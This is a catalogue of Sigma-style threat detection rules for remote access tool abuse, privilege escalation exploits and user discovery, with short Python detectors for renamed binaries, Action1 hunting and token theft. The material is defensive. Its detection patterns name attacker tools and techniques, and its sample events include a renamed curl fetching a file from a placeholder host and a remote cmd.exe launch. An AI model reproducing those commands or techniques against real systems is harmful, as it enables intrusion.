  • Outlook EnableUnsafeClientMailRules Setting Enabled - Level: high
    Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
  • Suspicious Remote Child Process From Outlook - Level: high
    Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
  • Potential Arbitrary DLL Load Using Winword - Level: medium
    Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
  • Renamed CURL.EXE Execution - Level: medium
    Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
  • Renamed ZOHO Dctask64 Execution - Level: high
    Description: Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
  • Renamed FTP.EXE Execution - Level: medium
    Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
  • Renamed NirCmd.EXE Execution - Level: high
    Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
  • Renamed PAExec Execution - Level: high
    Description: Detects execution of renamed version of PAExec. Often used by attackers
  • Renamed PingCastle Binary Execution - Level: high
    Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
  • Rundll32 Execution Without CommandLine Parameters - Level: high
    Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
  • Uncommon Child Process Of Setres.EXE - Level: high
    Description: Detects uncommon child process of Setres.EXE. Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
  • Suspicious Splwow64 Without Params - Level: high
    Description: Detects suspicious Splwow64.exe process without any command line parameters
  • Suspicious Service Binary Directory - Level: high
    Description: Detects a service binary running in a suspicious directory
  • Potential Binary Impersonating Sysinternals Tools - Level: medium
    Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection
  • Potentially Suspicious Child Process Of VsCode - Level: medium
    Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
  • WSL Child Process Anomaly - Level: medium
    Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
  • Windows Binary Executed From WSL - Level: medium
    Description: Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships
  • Custom File Open Handler Executes PowerShell - Level: high
    Description: Detects the abuse of custom file open handler, executing powershell
  • Arbitrary Command Execution Using WSL - Level: medium
    Description: Detects potential abuse of the Windows Subsystem for Linux (WSL) binary as a Living off the Land binary in order to execute arbitrary Linux or Windows commands.
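The "Renamed ... Execution" rules above all rest on one check: the PE version resource that Sysmon copies into its process-creation event (OriginalFileName) still names the real tool even after the file on disk has been renamed. The following is an added example, not code from the Sigma project; it runs that comparison over constructed Sysmon-style events (the paths, command lines and the set of watched tools are assumptions chosen to mirror the rules listed above).

```python
"""Flag renamed tool binaries by comparing PE metadata with the image name."""
import ntpath

# Tools the rules above watch, keyed by lowercased OriginalFileName, with the
# rule level each one is listed at on this page.
WATCHED = {
    "curl.exe": "medium",
    "ftp.exe": "medium",
    "nircmd.exe": "high",
    "paexec.exe": "high",
    "dctask64.exe": "high",
    "pingcastle.exe": "high",
}


def _image_name(image: str) -> str:
    """Basename of a Windows path, lowercased (ntpath works on any host OS)."""
    return ntpath.basename(image or "").lower()


def check_renamed(event: dict):
    """Return a finding if OriginalFileName is a watched tool but the file on
    disk carries a different name; None otherwise.

    Sysmon writes "-" when the PE has no version resource, so a stripped or
    forged resource silently falls through this check: pair it with hash or
    signature checks rather than relying on it alone."""
    original = (event.get("OriginalFileName") or "").lower()
    if original not in WATCHED:
        return None
    if _image_name(event.get("Image")) == original:
        return None  # same name on disk: not renamed
    return {
        "level": WATCHED[original],
        "original": original,
        "image": event.get("Image"),
        "command_line": event.get("CommandLine", ""),
    }


def scan(events):
    """Apply check_renamed to a batch of events and keep the findings."""
    return [f for f in (check_renamed(e) for e in events) if f]


# Constructed sample events (not real telemetry); field names follow Sysmon EID 1.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe -I https://example.invalid/"},
    {"Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"svchost.exe -o C:\Users\Public\s.dat https://example.invalid/s"},
    {"Image": r"C:\Temp\update.exe", "OriginalFileName": "PAExec.exe",
     "CommandLine": r"update.exe \\srv01 -s cmd.exe"},
    {"Image": r"C:\ProgramData\dc.exe", "OriginalFileName": "dctask64.exe",
     "CommandLine": "dc.exe"},
    {"Image": r"C:\Tools\NirCmd.exe", "OriginalFileName": "NirCmd.exe",
     "CommandLine": "NirCmd.exe win hide class Shell_TrayWnd"},
    {"Image": r"C:\Temp\x.exe", "OriginalFileName": "-", "CommandLine": "x.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["level"], finding["original"], "->", finding["image"])
```

The comparison is case-insensitive on both sides because the on-disk name and the version resource often differ only in case (the NirCmd event above is a legitimate copy and must not fire); the "-" event shows the blind spot mentioned in the docstring.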
attack.t1219 40
  • Antivirus Exploitation Framework Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • Potential Linux Amazon SSM Agent Hijacking - Level: medium
    Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
  • Atera Agent Installation - Level: high
    Description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators
  • Potential Remote Desktop Connection to Non-Domain Host - Level: medium
    Description: Detects logons using NTLM to hosts that are potentially not part of the domain.
  • Mesh Agent Service Installation - Level: medium
    Description: Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers
  • TacticalRMM Service Installation - Level: medium
    Description: Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.
  • DNS Query To AzureWebsites.NET By Non-Browser Process - Level: medium
    Description: Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
  • DNS Query To Remote Access Software Domain From Non-Browser App - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • TeamViewer Domain Query By Non-TeamViewer Application - Level: medium
    Description: Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)
  • Suspicious Binary Writes Via AnyDesk - Level: high
    Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
  • Anydesk Temporary Artefact - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • GoToAssist Temporary Installation Artefact - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • HackTool - Inveigh Execution Artefacts - Level: critical
    Description: Detects the presence and execution of Inveigh via dropped artefacts
  • HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators - Level: high
    Description: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
  • Installation of TeamViewer Desktop - Level: medium
    Description: Detects the creation of TeamViewer_Desktop.exe, which is created during installation
  • ScreenConnect Temporary Installation Artefact - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • TeamViewer Remote Session - Level: medium
    Description: Detects the creation of log files during a TeamViewer remote session
  • Hijack Legit RDP Session to Move Laterally - Level: high
    Description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
  • Remote Access Tool - AnyDesk Incoming Connection - Level: medium
    Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
  • Mstsc.EXE Execution With Local RDP File - Level: low
    Description: Detects potential RDP connection via Mstsc using a local ".rdp" file
  • Suspicious Mstsc.EXE Execution With Local RDP File - Level: high
    Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
  • QuickAssist Execution - Level: low
    Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
  • Remote Access Tool - AnyDesk Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - AnyDesk Piped Password Via CLI - Level: medium
    Description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
  • Remote Access Tool - AnyDesk Silent Installation - Level: high
    Description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
  • Remote Access Tool - Anydesk Execution From Suspicious Folder - Level: high
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - MeshAgent Command Execution via MeshCentral - Level: medium
    Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
  • Remote Access Tool - NetSupport Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - GoToAssist Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - LogMeIn Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - ScreenConnect Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution - Level: medium
    Description: Detects potentially suspicious child processes launched via the ScreenConnect client service.
  • Remote Access Tool - Simple Help Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Remote Access Tool - UltraViewer Execution - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
  • Potential Amazon SSM Agent Hijacking - Level: medium
    Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
  • Suspicious TSCON Start as SYSTEM - Level: high
    Description: Detects a tscon.exe start as LOCAL SYSTEM
  • Use of UltraVNC Remote Access Software - Level: medium
    Description: An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks
  • Potential SocGholish Second Stage C2 DNS Query - Level: high
    Description: Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic
  • Potential CSharp Streamer RAT Loading .NET Executable Image - Level: high
    Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
  • Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions - Level: medium
    Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. Action1 is a Remote Monitoring and Management tool that lets users execute commands, scripts, and binaries. Through the Action1 web interface, an administrator creates a new policy or app to establish remote execution and then targets the endpoints on which the agent is installed. Hunting opportunity 1 (weed out the noise): when a script, command, or binary is executed through one of these policies or apps, its name becomes visible in the command line during execution. For example, the following command line deploys a binary through a policy named "test_app_1": ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0". After establishing a baseline, split the command line to extract the policy name, group by policy name, and inspect the result as a frequency list. Hunting opportunity 2 (remote sessions outside office hours): if administrators in your environment use remote sessions to administer endpoints, build a threat-hunting query that filters on the start time of the initiated sessions and look for abnormal activity.
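The two Action1 hunting opportunities in the last entry above (policy-name frequency analysis, and sessions outside office hours) are concrete enough to script. The block below is an added example, not Action1's or the Sigma project's code. It assumes the command-line layout of the single sample on the page (`schedule:<Kind>__<policy>_<numeric suffix>`), uses a Sysmon-style UtcTime field for the time check, and treats 07:00 to 19:00 on weekdays as office hours; the events are constructed.

```python
"""Hunting helpers for Action1 agent command lines."""
import re
from collections import Counter
from datetime import datetime

# Assumed layout, generalised from the one sample on the page:
#   schedule:Deploy_App__test_app_1_1681327673425 runaction:0
# The action kind sits before the first "__", a numeric suffix after the last
# "_", and the operator-chosen policy/app name is everything in between.
SCHEDULE_RE = re.compile(r"schedule:(?P<kind>[A-Za-z_]+?)__(?P<rest>\S+)")


def parse_schedule(command_line):
    """Return {'kind', 'policy', 'suffix'} for an Action1 command line, else None."""
    m = SCHEDULE_RE.search(command_line or "")
    if not m:
        return None
    policy, sep, suffix = m.group("rest").rpartition("_")
    if not sep or not suffix.isdigit():
        return None  # layout differs from the assumed one: do not guess
    return {"kind": m.group("kind"), "policy": policy, "suffix": suffix}


def policy_frequency(events):
    """Hunting opportunity 1: executions per policy/app name."""
    counts = Counter()
    for e in events:
        parsed = parse_schedule(e.get("ParentCommandLine"))
        if parsed:
            counts[parsed["policy"]] += 1
    return counts


def rare_policies(events, max_count=1):
    """Policy names seen at most max_count times; review these first."""
    return sorted(p for p, n in policy_frequency(events).items() if n <= max_count)


def off_hours(events, start_hour=7, end_hour=19):
    """Hunting opportunity 2: policies run outside the assumed office window
    or on a weekend, judged on the event's UtcTime (Sysmon format)."""
    hits = []
    for e in events:
        parsed = parse_schedule(e.get("ParentCommandLine"))
        if not parsed:
            continue
        when = datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        if when.weekday() >= 5 or not (start_hour <= when.hour < end_hour):
            hits.append(parsed["policy"])
    return hits


# Constructed events (not real telemetry). 2023-04-12 is a Wednesday,
# 2023-04-15 a Saturday.
AGENT = r"C:\WINDOWS\Action1\action1_agent.exe"
SAMPLE_EVENTS = [
    {"UtcTime": "2023-04-12 10:00:01.000",
     "ParentCommandLine": f"{AGENT} schedule:Deploy_App__patch_baseline_1681300000000 runaction:0"},
    {"UtcTime": "2023-04-12 10:05:02.000",
     "ParentCommandLine": f"{AGENT} schedule:Deploy_App__patch_baseline_1681300000000 runaction:0"},
    {"UtcTime": "2023-04-12 10:10:03.000",
     "ParentCommandLine": f"{AGENT} schedule:Deploy_App__patch_baseline_1681300000000 runaction:0"},
    {"UtcTime": "2023-04-12 19:27:53.123",
     "ParentCommandLine": f"{AGENT} schedule:Deploy_App__test_app_1_1681327673425 runaction:0"},
    {"UtcTime": "2023-04-15 02:13:00.000",
     "ParentCommandLine": f"{AGENT} schedule:Run_Script__recon_1681400000000 runaction:0"},
    {"UtcTime": "2023-04-12 11:00:00.000",
     "ParentCommandLine": r"C:\Windows\System32\cmd.exe /c whoami"},  # not Action1
]

if __name__ == "__main__":
    print(policy_frequency(SAMPLE_EVENTS))
    print("rare:", rare_policies(SAMPLE_EVENTS))
    print("off-hours:", off_hours(SAMPLE_EVENTS))
```

The numeric suffix is treated as an opaque identifier rather than as the execution time, since the page does not say what it encodes; the time check therefore relies on the event timestamp. Lines that do not match the assumed layout are skipped rather than partially parsed, so a layout change shows up as a drop in parsed volume instead of as bogus policy names.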
attack.t1068 34
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • Usage Of Malicious POORTRY Signed Driver - Level: high
    Description: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.
  • Vulnerable Dell BIOS Update Driver Load - Level: high
    Description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
  • Vulnerable Driver Load By Name - Level: low
    Description: Detects the load of known vulnerable drivers via their names only.
  • Hurricane Panda Activity - Level: high
    Description: Detects Hurricane Panda Activity
  • Possible Coin Miner CPU Priority Param - Level: critical
    Description: Detects command line parameter very often used with coin miners
  • Buffer Overflow Attempts - Level: high
    Description: Detects buffer overflow attempts in Unix system log files
  • Nimbuspwn Exploitation - Level: high
    Description: Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)
  • Sudo Privilege Escalation CVE-2019-14287 - Builtin - Level: critical
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • Sudo Privilege Escalation CVE-2019-14287 - Level: high
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
  • OMIGOD HTTP No Authentication RCE - Level: high
    Description: Detects the exploitation of OMIGOD (CVE-2021-38647), which allows remote code execution (RCE) as root with a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP); the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API because a known vulnerability is being exploited. Microsoft started using this log in January 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
  • Malicious Driver Load - Level: high
    Description: Detects loading of known malicious drivers via their hash.
  • Malicious Driver Load By Name - Level: medium
    Description: Detects loading of known malicious drivers via the file name of the drivers.
  • Vulnerable Driver Load By Name - Level: low
    Description: Detects the load of known vulnerable drivers via the file name of the drivers.
  • Vulnerable Driver Load - Level: high
    Description: Detects loading of known vulnerable drivers via their hash.
  • Process Explorer Driver Creation By Non-Sysinternals Binary - Level: high
    Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
  • Process Monitor Driver Creation By Non-Sysinternals Binary - Level: medium
    Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
  • HackTool - SysmonEOP Execution - Level: critical
    Description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
  • Suspicious Spool Service Child Process - Level: high
    Description: Detects suspicious print spool service (spoolsv.exe) child processes.
  • Exploiting SetupComplete.cmd CVE-2019-1378 - Level: high
    Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
  • Exploiting CVE-2019-1388 - Level: critical
    Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
  • InstallerFileTakeOver LPE CVE-2021-41379 File Create Event - Level: critical
    Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
  • Potential CVE-2021-41379 Exploitation Attempt - Level: critical
    Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
  • Potential SystemNightmare Exploitation Attempt - Level: critical
    Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
  • Suspicious Sysmon as Execution Parent - Level: high
    Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
  • Potential Zerologon (CVE-2020-1472) Exploitation - Level: high
    Description: Detects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472)
  • CVE-2021-3156 Exploitation Attempt - Level: high
    Description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing required to trigger the heap-based buffer overflow.
  • CVE-2021-3156 Exploitation Attempt Bruteforcing - Level: high
    Description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to the bruteforcing required to trigger the heap-based buffer overflow.
  • Potential CVE-2021-4034 Exploitation Attempt - Level: high
    Description: Detects exploitation attempt of the vulnerability described in CVE-2021-4034.
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed is created as a temp file in the /tmp folder with a scx* prefix, then invoked from the directory /etc/opt/microsoft/scx/conf/tmpdir/, where the file carries the same scx* prefix. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • Windows Kernel and 3rd-Party Drivers Exploits Token Stealing - Level: high
    Description: Detects child processes spawned with SYSTEM privileges by parents that run with non-SYSTEM privileges at Medium integrity level
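The token-stealing rule in the last entry above is a parent/child correlation: the child's process-creation event says who the child runs as, but the parent's privileges and integrity level live on the parent's own creation event. The block below is an added example, not the Sigma rule itself; it joins Sysmon-style events on ProcessGuid/ParentProcessGuid and applies the stated conditions. The events, GUIDs and paths are constructed.

```python
"""Find SYSTEM children of Medium-integrity, non-SYSTEM parents."""

# Service accounts that legitimately spawn SYSTEM children all the time.
PRIVILEGED_USERS = {
    "nt authority\\system",
    "nt authority\\local service",
    "nt authority\\network service",
}


def _norm(user):
    return (user or "").lower()


def find_token_theft(events):
    """Return (parent_image, child_image) pairs where a parent running as a
    non-SYSTEM user at Medium integrity spawned a child as NT AUTHORITY\\SYSTEM.

    Children whose parent creation event is not in the batch are skipped:
    with no parent record there is nothing to judge, and guessing would only
    produce noise."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    findings = []
    for child in events:
        if _norm(child.get("User")) != "nt authority\\system":
            continue
        parent = by_guid.get(child.get("ParentProcessGuid"))
        if parent is None:
            continue
        if _norm(parent.get("User")) in PRIVILEGED_USERS:
            continue  # SYSTEM spawning SYSTEM is normal
        if parent.get("IntegrityLevel") != "Medium":
            continue  # the rule is scoped to Medium-integrity parents
        findings.append((parent["Image"], child["Image"]))
    return findings


# Constructed Sysmon EID 1 style events (not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessGuid": "{P-1}", "ParentProcessGuid": "{P-0}",
     "Image": r"C:\Windows\System32\services.exe",
     "User": r"NT AUTHORITY\SYSTEM", "IntegrityLevel": "System"},
    {"ProcessGuid": "{P-2}", "ParentProcessGuid": "{P-1}",
     "Image": r"C:\Windows\System32\spoolsv.exe",
     "User": r"NT AUTHORITY\SYSTEM", "IntegrityLevel": "System"},
    {"ProcessGuid": "{P-3}", "ParentProcessGuid": "{P-0}",
     "Image": r"C:\Windows\explorer.exe",
     "User": r"CORP\alice", "IntegrityLevel": "Medium"},
    {"ProcessGuid": "{P-4}", "ParentProcessGuid": "{P-3}",
     "Image": r"C:\Users\alice\Downloads\poc.exe",
     "User": r"CORP\alice", "IntegrityLevel": "Medium"},
    {"ProcessGuid": "{P-5}", "ParentProcessGuid": "{P-4}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "User": r"NT AUTHORITY\SYSTEM", "IntegrityLevel": "System"},
    {"ProcessGuid": "{P-6}", "ParentProcessGuid": "{P-3}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "User": r"CORP\alice", "IntegrityLevel": "High"},  # UAC elevation, same user
    {"ProcessGuid": "{P-7}", "ParentProcessGuid": "{P-9}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "User": r"NT AUTHORITY\SYSTEM", "IntegrityLevel": "System"},  # orphan
]

if __name__ == "__main__":
    for parent_image, child_image in find_token_theft(SAMPLE_EVENTS):
        print(f"{parent_image} -> {child_image}")
```

Only the poc.exe to cmd.exe pair fires: services.exe spawning spoolsv.exe is SYSTEM spawning SYSTEM, the High-integrity cmd.exe is ordinary UAC elevation of the same user, and the orphan child has no parent record to compare against. Newer Sysmon releases also record the parent's user on the child event, which removes the join for the user check but not for the parent integrity level.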
attack.t1033 33
  • Run Whoami as SYSTEM - Level: high
    Description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.
  • Possible DCSync Attack - Level: high
    Description: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.
  • SharpHound Recon Sessions - Level: high
    Description: Detects remote RPC calls used by SharpHound to map remote connections and local group membership.
  • System Owner or User Discovery - Linux - Level: low
    Description: Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
  • ESXi Network Configuration Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
  • ESXi Storage Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
  • ESXi System Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc.
  • ESXi VM List Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
  • ESXi VSAN Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • Get-ADUser Enumeration Using UserAccountControl Flags - Level: medium
    Description: Detects Get-ADUser enumeration using UserAccountControl flags, a precursor to AS-REP roasting. AS-REP roasting is an often-overlooked attack; it is not very common, as accounts must be explicitly configured not to require pre-authentication.
  • Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell - Level: medium
